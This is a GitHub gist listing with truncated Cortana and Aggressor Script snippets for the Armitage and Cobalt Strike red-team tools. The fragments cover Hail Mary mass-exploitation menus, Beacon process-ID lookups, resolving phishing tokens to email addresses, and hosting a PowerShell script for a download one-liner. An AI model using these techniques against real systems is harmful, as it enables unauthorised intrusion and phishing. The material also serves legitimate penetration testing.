Skip to content

Instantly share code, notes, and snippets.

View rsmudge's full-sized avatar

Raphael rsmudge

View GitHub Profile
@rsmudge
rsmudge / gist:6717127
Created September 26, 2013 17:02
Cortana Find Attacks / Hail Mary Samples (taken out of context, not tested in production, used for testing in a stripped down Armitage)
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
sub exploitPorts {
local('$exploit %exploits $options $port');
foreach $exploit (modules("exploits")) {
$options = options("exploit", $exploit);
if ('RPORT' in $options) {
@rsmudge
rsmudge / gist:6717164
Created September 26, 2013 17:04
Cortana Hail Mary / Find Attacks Example (taken from my development testing... not tested recently. This code was used in a highly stripped down version of Armitage)
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
popup attacks {
item "&Find Attacks" {
spawn(&runFindAttacks);
}
item "&Hail Mary" {
@rsmudge
rsmudge / irc.cna
Created February 19, 2016 16:24
Aggressor Script IRC Example
#
# Quick/Dirty IRC Library for use with Aggressor Script
# https://www.cobaltstrike.com/aggressor-script/index.html
#
# irc_close($handle);
sub irc_close {
println($1, "QUIT :Good bye!");
closef($1);
}
@rsmudge
rsmudge / bot.cna
Created June 15, 2016 15:38
Demonstration inversion-of-control using co-routines in Aggressor Script.
# demonstrate an example of inversion-of-control with Aggressor Script
#
# co-routine,
sub bot {
# run pwd and get the output.
bpwd($bid);
when("beacon_output_alt", $this);
yield;
@rsmudge
rsmudge / getpidany.cna
Created May 2, 2016 16:30
Get PID of Any Process
# getexplorerpid($bid, &callback);
sub getanypid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq $proc) {
# $1 is our Beacon ID, $pid is the PID of $proc
[$callback: $1, $proc, $pid];
}
@rsmudge
rsmudge / getexplorer.cna
Created March 18, 2016 20:47
# getexplorerpid($bid, &callback);
sub getexplorerpid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") {
# $1 is our Beacon ID, $pid is the PID of explorer.exe
[$callback: $1, $pid];
}
@rsmudge
rsmudge / tokenToEmail.cna
Created March 31, 2017 21:58
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
@rsmudge
rsmudge / getenv.cna
Last active December 11, 2019 19:45
#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');
# request environment variables for every new Beacon that comes in.
on beacon_initial {
# ideally, we'd have a bshell that could take callbacks. We don't have
# this yet. Eventually though, we will.
@rsmudge
rsmudge / safedelete.cna
Created September 1, 2017 16:56
Override default file browser popup in Cobalt Strike to prompt user when they try to delete a file.
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
item "&Download" {
local('$file');
foreach $file ($3) {
bdownload($1, "$2 $+ \\ $+ $file");
@rsmudge
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;